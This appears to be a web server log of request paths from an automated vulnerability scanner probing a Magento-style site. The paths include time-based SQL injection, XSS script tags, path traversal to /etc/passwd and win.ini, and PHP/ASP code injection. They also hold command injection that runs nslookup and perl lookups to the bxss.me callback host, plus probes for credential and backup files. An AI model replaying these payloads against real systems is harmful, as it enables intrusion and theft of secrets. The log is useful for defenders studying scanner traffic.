/-1%20OR%203+943-943-1=0+0+0+1/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/acc/js/1%00%c0%a7%c0%a2%252527%252522/extended_debug.js 1 https://104.36.149.61/
/%2fxfs.bxss.me/js/mage/adminhtml/browser.js 1 -
/'.print(md5(31337)).'/js/mage/adminhtml/form.js 1 -
/./RestAPI/LogonCustomization 1 -
/'+'A'.concat(70-3).concat(22*4).concat(98).concat(78).concat(114).concat(84)+(require'socket'%0aSocket.gethostbyname('hitgq'+'tzzrpcpn60770.bxss.me.')[3].to_s)+'/js/mage/adminhtml/product/ 1 -
/acc//mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/skin/install/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/default/css/iestyles.css 1 https://104.36.149.61/
/response.write(9322062*9635078)/js/prototype/ 1 -
/acc/index.php//../../WEB-INF/web.xml%C0%80.jsp 1 -
/acc/js/.%2fprototype/validation.js 1 https://104.36.149.61/
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/skin/install/default/ 1 https://104.36.149.61/
/Fwx5MLdJ'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/<!--/js/mage/adminhtml/form.js 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/js/mage/translate'\"()&%25<acx><ScRiPt%20>Thnf(9782)<%2fScRiPt>.js 1 https://104.36.149.61/
//%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c 1 -
/1'\"/skin/frontend/ 1 https://104.36.149.61/
/$(nslookup%20hitszbkrsvahua15c9.bxss.me||perl%20-e%20\"gethostbyname('hitszbkrsvahua15c9.bxss.me')\")/js/mage/adminhtml/sales/ 1 -
/F2E4GuIx')%20OR%20299=(SELECT%20299%20FROM%20PG_SLEEP(15))--/js/prototype/validation.js 1 https://104.36.149.61/
/..%2fpackage-lock.json 1 -
/acc/skin/'\"()&%25<acx><ScRiPt%20>Ijhk(9237)<%2fScRiPt>/default/default/css/boxes.css 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/index.php/install/wizard/config/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/beginPost/..%2f..%2f..%2fpackage.json 1 -
/backup_104.tar 1 -
/acc/%2fxfs.bxss.me/install/default/default/ 1 -
/xmlrpc.php 4 -
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/d2z9iwtf')%20OR%20484=(SELECT%20484%20FROM%20PG_SLEEP(15))--/js/prototype/ 1 https://104.36.149.61/
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/grid.js 1 https://104.36.149.61/
/authenticationendpoint/sss.jsp 1 -
/'%3bprint(md5(31337))%3b$a='/js/prototype/validation.js 1 -
/'\"/js/mage/adminhtml/backup.js 1 -
/${@print(md5(31337))}\\/js/prototype/windows/themes/ 1 -
/acc/skin/install/default/bxss.me%2ft%2fxss.html%3f%2500/css/boxes.css 1 -
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/mage/adminhtml/backup.js 1 -
/pi.php5 1 -
/'.print(md5(31337)).'/index.php/install/wizard/config/ 1 -
/$(nslookup%20hitaagsumoiaj0ae11.bxss.me||perl%20-e%20\"gethostbyname('hitaagsumoiaj0ae11.bxss.me')\")/js/mage/adminhtml/events.js 1 -
/acc/%3b(nslookup%20hittgodyznltrddadc.bxss.me||perl%20-e%20\"gethostbyname('hittgodyznltrddadc.bxss.me')\")|(nslookup%20hittgodyznltrddadc.bxss.me||perl%20-e%20\"gethostbyname('hittgodyznltrddadc.bxss.me')\")&(nslookup%20hittgodyznltrddadc.bxss.me||perl%2 1 -
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
//js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/cognos_express/manager/html/ 1 -
/admin/pma/main.php 1 -
/acc/..%2fskin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/scriptaculous/effects.js 1 https://104.36.149.61/
/\"+response.write(9579160*9940985)+\"/skin/install/default/ 1 -
/acc/skin/install/default/default/css/1some_inexistent_file_with_long_name%00.jpg.css 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"34hM\"=\"34hM/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/Flex/history/historyFrame.html 1 -
/acc/skin/%3b(nslookup%20hitkahldfczml92cd5.bxss.me||perl%20-e%20\"gethostbyname('hitkahldfczml92cd5.bxss.me')\")|(nslookup%20hitkahldfczml92cd5.bxss.me||perl%20-e%20\"gethostbyname('hitkahldfczml92cd5.bxss.me')\")&(nslookup%20hitkahldfczml92cd5.bxss.me||p 1 -
//../../../../../../../../windows/win.ini%00 1 -
/acc/index.php/install/wizard/..%2f..%2f..%2f..%2fweb.config 1 -
/9ra1hV63'%3b%20waitfor%20delay%20'0:0:15'%20--%20/skin/install/default/default/css/reset.css 1 https://104.36.149.61/
/acc/skin/install/default'\"()&%25<acx><ScRiPt%20>c1E3(9029)<%2fScRiPt>/default/css/ie7minus.css 1 https://104.36.149.61/
/.sh_history 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/install/ 1 https://104.36.149.61/
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/js/mage/adminhtml/hash.js 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/prototype/windows/themes/ 1 https://104.36.149.61/
/backup-104.tgz 1 -
/&echo%20gsnvdu$()\\%20miqrgk\\nz^xyu||a%20%23'%20&echo%20gsnvdu$()\\%20miqrgk\\nz^xyu||a%20%23|\"%20&echo%20gsnvdu$()\\%20miqrgk\\nz^xyu||a%20%23/js/mage/adminhtml/wysiwyg/ 1 -
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/giftmessage.js 1 -
/actuator 1 -
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/translate.js 1 https://104.36.149.61/
/acc/index.php/bxss.me%2ft%2fxss.html%3f%2500/wizard/locale/ 1 -
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/prototype/extended_debug.js 1 -
/sitemap.xml.gz 1 -
/acc/js/mage/.%2fadminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/skin/install/default/.%2fdefault/css/iestyles.css 1 https://104.36.149.61/
/cgi-bin/config/secrets.yml 1 -
/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php 1 -
/acc/index.php/install/wizard/config//........................................................................../../../../../../../../windows/win.ini 1 -
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/giftmessage.js 1 -
/admin/config.php 8 -
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/ 1 https://104.36.149.61/
/acc/skin/install/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/ 1 -
/0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z/skin/install/default/default/ 1 https://104.36.149.61/
/acc/skin/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/default/ 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/adminhtml/accordion.js 1 -
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/backup.js 1 -
/acc/skin/install'\"()&%25<acx><ScRiPt%20>c1E3(9482)<%2fScRiPt>/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/index.php/../../package-lock.json 1 -
/-1%20OR%203+163-163-1=0+0+0+1/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/acc/js/.%2fmage/adminhtml/events.js 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'mVLg'='mVLg/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/skin/install/default/ 1 https://104.36.149.61/
/'.print(md5(31337)).'/js/mage/adminhtml/grid.js 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/prototype/tooltip_manager.js 1 -
/.zshrc 1 -
/if(now()=sysdate(),sleep(15),0)/js/prototype/extended_debug.js 1 https://104.36.149.61/
/acc/skin/install/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/default/css/clears.css 1 -
/!(()&&!|*|*|/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/gs/plugins/editors/fckeditor 2 -
/\"%3bprint(md5(31337))%3b$a=\"/js/mage/adminhtml/giftmessage.js 1 -
/cgi-bin/gruntFile.js 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/adminhtml/image.js 1 -
/acc/js/prototype/windows/'\"()&%25<acx><ScRiPt%20>sjVf(9809)<%2fScRiPt>/ 1 https://104.36.149.61/
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/prototype/windows/ 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(101).concat(71).concat(107).concat(71)+(require'socket'%0aSocket.gethostbyname('hitfi'+'zwtlmxvqb4852.bxss.me.')[3].to_s)+'/js/scriptaculous/effects.js 1 -
/acc/js<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/mage/translate.js 1 -
/acc/index.php/install/wizard/config//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd 1 -
/acc'||'/skin/adminhtml/ 1 https://104.36.149.61/
/lohu2lk9'%3b%20waitfor%20delay%20'0:0:15'%20--%20/js/scriptaculous/effects.js 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/prototype/ 1 https://104.36.149.61/
/1'\"/js/prototype/windows/ 1 https://104.36.149.61/
/zadmin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php 1 -
/lib/phpThumb/phpThumb.php 1 -
/acc/1%00%c0%a7%c0%a2%252527%252522/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/js/prototype/prototype.js 1 -
/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/1'\"/js/mage/adminhtml/form.js 1 https://104.36.149.61/
/acc/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/tooltip_manager.js 1 https://104.36.149.61/
/@@kYGP1/js/varien/js.js 1 https://104.36.149.61/
/http://bxss.me/t/fit.txt%3F.jpg/index.php/install/ 1 https://104.36.149.61/
/.%2facc/index.php/install/ 1 https://104.36.149.61/
/database.sql.tar 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/1%00%c0%a7%c0%a2%252527%252522/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"J8cV\"=\"J8cV/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/1Tjc0fwP')%20OR%20475=(SELECT%20475%20FROM%20PG_SLEEP(15))--/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/.%2facc/js/mage/adminhtml/accordion.js 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/skin/install/default/default/css/clears.css 1 -
/info.php 2 -
/axis2/axis2-admin/welcome 1 -
/http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg/skin/adminhtml/default/ 1 https://104.36.149.61/
//conf.inc 1 -
/acc/..%2fjs/mage/adminhtml/ 1 https://104.36.149.61/
/acc/js/mage/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/hash.js 1 https://104.36.149.61/
/acc/js/prototype/./WEB-INF/web.xml%00.jsp 2 -
/acc/js/1%00%c0%a7%c0%a2%252527%252522/adminhtml/accordion.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/..%2f..%2f..%2f..%2fGemfile 1 -
/ReportServer 4 -
/-1%20OR%203+42-42-1=0+0+0+1/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
//.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/boot.ini 1 -
/acc/..%2fjs/prototype/tooltip_manager.js 1 https://104.36.149.61/
/!(()&&!|*|*|/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/104.7z 1 -
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/install/default/default/css/clears.css 1 https://104.36.149.61/
/acc/index.php/install/wizard/locale//../../../../../../../../etc/passwd%00en 1 -
/acc/index.php/..%2f..%2fpackage-lock.json 1 -
/'+'A'.concat(70-3).concat(22*4).concat(114).concat(73).concat(111).concat(81)+(require'socket'%0aSocket.gethostbyname('hitht'+'obiypvsi8f004.bxss.me.')[3].to_s)+'/index.php/install/wizard/config/ 1 -
/acc/skin/install/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/default/css/ie7minus.css 1 -
/acc'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/acc/js/mage/adminhtml/form.js/919266%40 1 https://104.36.149.61/
/.%2facc/js/mage/ 1 https://104.36.149.61/
/acc/index.php/install/wizard/config/..%2f..%2fpackage-lock.json 1 -
/acc/js/mage/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/events.js 1 https://104.36.149.61/
/1%20waitfor%20delay%20'0:0:15'%20--%20/js/varien/js.js 1 https://104.36.149.61/
/acc/js/mage/%2fxfs.bxss.me/flexuploader.js 1 -
/acc/index.php<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/install/wizard/locale/ 1 -
/%3b(nslookup%20hitnlvwxhwksxcda4c.bxss.me||perl%20-e%20\"gethostbyname('hitnlvwxhwksxcda4c.bxss.me')\")|(nslookup%20hitnlvwxhwksxcda4c.bxss.me||perl%20-e%20\"gethostbyname('hitnlvwxhwksxcda4c.bxss.me')\")&(nslookup%20hitnlvwxhwksxcda4c.bxss.me||perl%20-e% 1 -
/.%2facc/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/acc/js/mage/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/form.js 1 -
/acc/index.php/install/wizard/config//../WEB-INF/web.xml%00.jsp 1 -
/response.write(9154441*9534260)/skin/install/default/default/css/ie7minus.css 1 -
/acc/js/'\"()&%25<acx><ScRiPt%20>KYzi(9090)<%2fScRiPt>/adminhtml/image.js 1 https://104.36.149.61/
/acc/skin/install/default/default/css/boxes'\"()&%25<acx><ScRiPt%20>Ijhk(9128)<%2fScRiPt>.css 1 https://104.36.149.61/
/'\"/js/mage/adminhtml/ 1 -
/%2fxfs.bxss.me/index.php/install/wizard/config/ 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/giftmessage.js 1 https://104.36.149.61/
/acc/index.php/install/wizard/config/..%2f..%2f..%2f..%2f..%2fpackage.json 1 -
/acc/..%2fskin/adminhtml/default/ 1 https://104.36.149.61/
/acc/js/mage/%2fxfs.bxss.me/image.js 1 -
/nagiosql/admin/helpedit.php 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/flexuploader.js 1 https://104.36.149.61/
/|echo%20slhjjl$()\\%20ccjjgc\\nz^xyu||a%20%23'%20|echo%20slhjjl$()\\%20ccjjgc\\nz^xyu||a%20%23|\"%20|echo%20slhjjl$()\\%20ccjjgc\\nz^xyu||a%20%23/js/mage/adminhtml/hash.js 1 -
/acc/js/mage<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/adminhtml/ 1 -
/acc. 1 -
/xCOyVQnw'))%20OR%20751=(SELECT%20751%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/@@Wwfri/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/'.gethostbyname(lc('hityf'.'dvgjirmv0c382.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(73).chr(112).chr(89).'/js/mage/ 1 -
/104.36.149.61.7z 1 -
/acc/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/mage/adminhtml/browser.js 1 https://104.36.149.61/
/acc/index.php/'\"()&%25<acx><ScRiPt%20>pdCA(9782)<%2fScRiPt>/ 1 https://104.36.149.61/
/1'\"/js/varien/js.js 1 https://104.36.149.61/
/acc/1%00%c0%a7%c0%a2%252527%252522/adminhtml/default/ 1 https://104.36.149.61/
/acc/js/1some_inexistent_file_with_long_name%00.jpg/windows/themes/ 1 https://104.36.149.61/
/acc/skin/bxss.me%2ft%2fxss.html%3f%2500/default/ 1 -
/cC7eN1qz'%3b%20waitfor%20delay%20'0:0:15'%20--%20/index.php/install/wizard/config/ 1 https://104.36.149.61/
/3xzm8mzi')%20OR%20772=(SELECT%20772%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/mage/adminhtml/sales/ 1 https://104.36.149.61/
/ljLct6no/skin/frontend/ 1 https://104.36.149.61/
/acc/skin/install/default/default/%3b(nslookup%20hittaghyofcam9bf07.bxss.me||perl%20-e%20\"gethostbyname('hittaghyofcam9bf07.bxss.me')\")|(nslookup%20hittaghyofcam9bf07.bxss.me||perl%20-e%20\"gethostbyname('hittaghyofcam9bf07.bxss.me')\")&(nslookup%20hitta 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/js/mage/adminhtml/image.js 1 https://104.36.149.61/
/WEB-INF%20-%20Copy/jboss-web.xml 1 -
/acc/js/..%2fvarien/form.js 1 https://104.36.149.61/
/oaZ43cim'%3b%20waitfor%20delay%20'0:0:15'%20--%20/skin/adminhtml/ 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/prototype/debug.js 1 https://104.36.149.61/
/%3bassert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'))%3b/js/mage/adminhtml/accordion.js 1 -
/acc/.%2fskin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/.bzr/README 1 -
/'\"()&%25<acx><ScRiPt%20>KhMd(9013)<%2fScRiPt>/index.php/install/wizard/config/ 1 https://104.36.149.61/
//skin/install/default/default/ 1 https://104.36.149.61/
/acc/js/scriptaculous/effects<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>.js 1 -
/acc/index.php/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd/locale/ 1 https://104.36.149.61/
/%3b(nslookup%20hitwqbnjmbaqk1e759.bxss.me||perl%20-e%20\"gethostbyname('hitwqbnjmbaqk1e759.bxss.me')\")|(nslookup%20hitwqbnjmbaqk1e759.bxss.me||perl%20-e%20\"gethostbyname('hitwqbnjmbaqk1e759.bxss.me')\")&(nslookup%20hitwqbnjmbaqk1e759.bxss.me||perl%20-e% 1 -
/.%2facc/js/mage/adminhtml/sales/ 1 https://104.36.149.61/
/cgi-bin/jarrewrite.sh 1 ()%20{%20Referer
/response.write(9077201*9826036)/js/mage/translate.js 1 -
/acc/js/mage/%3b(nslookup%20hittisdhbjoqh5a221.bxss.me||perl%20-e%20\"gethostbyname('hittisdhbjoqh5a221.bxss.me')\")|(nslookup%20hittisdhbjoqh5a221.bxss.me||perl%20-e%20\"gethostbyname('hittisdhbjoqh5a221.bxss.me')\")&(nslookup%20hittisdhbjoqh5a221.bxss.me 1 -
/acc/js/bxss.me%2ft%2fxss.html%3f%2500/form.js 1 -
/.project 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/scriptaculous/effects.js 1 -
/$(nslookup%20hitnpmytjirlb922d4.bxss.me||perl%20-e%20\"gethostbyname('hitnpmytjirlb922d4.bxss.me')\")/index.php/install/ 1 -
/acc/index.php/install/wizard/locale/..%2f..%2f..%2fpackage.json 1 -
/credentials.xml 1 -
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/index.php/install/ 1 https://104.36.149.61/
/acc/js/prototype/..%2fwindows/themes/ 1 https://104.36.149.61/
/'+response.write(9912697*9392180)+'/js/mage/adminhtml/product/ 1 -
/'\"/js/prototype/debug.js 1 -
/104.36.149.61-dump.7z 1 -
/-1%20OR%202+269-269-1=0+0+0+1/skin/install/default/default/css/boxes.css 1 https://104.36.149.61/
/acc'%20AND%202*3*8=6*8%20AND%20'wnp4'='wnp4/js/mage/ 1 https://104.36.149.61/
/acc/js/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/extended_debug.js 1 -
/acc'%20AND%202*3*8=6*8%20AND%20'oawJ'='oawJ/js/mage/adminhtml/browser.js 1 https://104.36.149.61/
/bxss.me%2ft%2fxss.html%3f%2500/js/prototype/windows/ 1 -
/&(nslookup%20hitnsgdajavbp0d4f8.bxss.me||perl%20-e%20\"gethostbyname('hitnsgdajavbp0d4f8.bxss.me')\")&'\\\"`0&(nslookup%20hitnsgdajavbp0d4f8.bxss.me||perl%20-e%20\"gethostbyname('hitnsgdajavbp0d4f8.bxss.me')\")&`'/js/prototype/validation.js 1 -
/acc/index.php/install<esi:include%20src=\"http:%2f%2fbxss.me%2frpb.png\"%2f>/ 1 -
/acc/skin'\"()&%25<acx><ScRiPt%20>dgnk(9672)<%2fScRiPt>/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/\"+\"A\".concat(70-3).concat(22*4).concat(111).concat(78).concat(114).concat(83)+(require\"socket\"%0aSocket.gethostbyname(\"hitnf\"+\"aofxngeo56574.bxss.me.\")[3].to_s)+\"/js/mage/adminhtml/form.js 1 -
/config/database.yml~ 1 -
/'+response.write(9878539*9854552)+'/js/prototype/validation.js 1 -
/.%2facc/skin/install/default/default/css/iestyles.css 1 https://104.36.149.61/
/${10000187+9999469}/js/varien/form.js 1 -
/)/skin/install/default/default/ 1 https://104.36.149.61/
/acc/skin/install/default/default/bxss.me%2ft%2fxss.html%3f%2500/iestyles.css 1 -
/-1%20OR%202+765-765-1=0+0+0+1/skin/install/default/default/ 1 https://104.36.149.61/
/acc/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/install/wizard/locale/ 1 https://104.36.149.61/
/&echo%20hrsmft$()\\%20nncwyu\\nz^xyu||a%20%23'%20&echo%20hrsmft$()\\%20nncwyu\\nz^xyu||a%20%23|\"%20&echo%20hrsmft$()\\%20nncwyu\\nz^xyu||a%20%23/js/mage/adminhtml/giftoptions/ 1 -
/HNAP1 1 -
///.env 2 -
//..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fboot.ini 1 -
/acc/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/mage/adminhtml/sales/ 1 -
/acc'\"()&%25<acx><ScRiPt%20>JVyg(9132)<%2fScRiPt>/js/mage/adminhtml/backup.js 1 https://104.36.149.61/
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/sales/ 1 https://104.36.149.61/
/9BN68eZ5'))%20OR%2076=(SELECT%2076%20FROM%20PG_SLEEP(15))--/skin/install/default/default/css/ie7minus.css 1 https://104.36.149.61/
/cmdasp.asp 1 -
/acc/index.php/install/../../../package.json 1 -
/\".gethostbyname(lc(\"hitnj\".\"qrarlzry6bf8e.bxss.me.\")).\"A\".chr(67).chr(hex(\"58\")).chr(120).chr(81).chr(105).chr(81).\"/js/mage/ 1 -
/HttP:%2f%2fbxss.me%2ft%2fxss.html%3f%2500/js/mage/adminhtml/hash.js 1 -
/bxss.me%2ft%2fxss.html%3f%2500/skin/frontend/ 1 -
/components/com_flexicontent/librairies/phpthumb/phpThumb.php 1 -
/acc/1some_inexistent_file_with_long_name%00.jpg/mage/adminhtml/browser.js 1 https://104.36.149.61/
/$(nslookup%20hitsakhyyoqivc00d3.bxss.me||perl%20-e%20\"gethostbyname('hitsakhyyoqivc00d3.bxss.me')\")/skin/install/default/default/css/clears.css 1 -
/<!--/js/mage/adminhtml/hash.js 1 -
/acc/..%2fjs/mage/adminhtml/product/ 1 https://104.36.149.61/
/1'\"/skin/install/default/default/ 1 https://104.36.149.61/
/1'\"/js/scriptaculous/effects.js 1 https://104.36.149.61/
/^(%23$!@%23$)(()))******/js/prototype/tooltip_manager.js 1 https://104.36.149.61/
/'+'A'.concat(70-3).concat(22*4).concat(116).concat(81).concat(99).concat(79)+(require'socket'%0aSocket.gethostbyname('hitxn'+'kdimrizjf30bc.bxss.me.')[3].to_s)+'/skin/adminhtml/default/ 1 -
/${@print(md5(31337))}/skin/install/default/ 1 -
/libraries/tiny_mce 1 -
/0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z/skin/install/default/default/css/clears.css 1 https://104.36.149.61/
/dana-na///css/ds.js 1 -
/104.tar 1 -
/'\"()&%25<acx><ScRiPt%20>ntvJ(9867)<%2fScRiPt>/js/prototype/validation.js 1 https://104.36.149.61/
/1'\"/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/response.write(9455979*9095726)/skin/adminhtml/ 1 -
/acc/skin/install/default/(select(0)from(select(sleep(15)))v)%2f*'+(select(0)from(select(sleep(15)))v)+'\"+(select(0)from(select(sleep(15)))v)+\"*%2f/ 1 https://104.36.149.61/
/@@jwCex/js/mage/adminhtml/grid.js 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/skin/install/default/ 1 https://104.36.149.61/
/acc\"%20AND%202*3*8=6*8%20AND%20\"xPBc\"=\"xPBc/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/echo%20orfgel$()\\%20weldbo\\nz^xyu||a%20%23'%20&echo%20orfgel$()\\%20weldbo\\nz^xyu||a%20%23|\"%20&echo%20orfgel$()\\%20weldbo\\nz^xyu||a%20%23/js/prototype/tooltip_manager.js 1 -
/acc/%3b(nslookup%20hitvrxrsuhhioae550.bxss.me||perl%20-e%20\"gethostbyname('hitvrxrsuhhioae550.bxss.me')\")|(nslookup%20hitvrxrsuhhioae550.bxss.me||perl%20-e%20\"gethostbyname('hitvrxrsuhhioae550.bxss.me')\")&(nslookup%20hitvrxrsuhhioae550.bxss.me||perl%2 1 -
/${@print(md5(31337))}/js/mage/adminhtml/backup.js 1 -
/acc%25'%20AND%202*3*8=6*8%20AND%20'oAfI'!='oAfI%25/js/mage/adminhtml/product/ 1 https://104.36.149.61/
/acc/skin/install/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/default/css/clears.css 1 https://104.36.149.61/
/1some_inexistent_file_with_long_name%00.jpg/js/mage/adminhtml/giftoptions/ 1 https://104.36.149.61/
/Http://bxss.me/t/fit.txt/js/varien/form.js 1 https://104.36.149.61/
/%2fxfs.bxss.me/js/mage/adminhtml/giftmessage.js 1 -
/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini/js/mage/adminhtml/events.js 1 https://104.36.149.61/
/if(now()=sysdate(),sleep(15),0)/js/mage/adminhtml/wysiwyg/ 1 https://104.36.149.61/
/\"+response.write(9275102*9941646)+\"/js/mage/adminhtml/grid.js 1 -
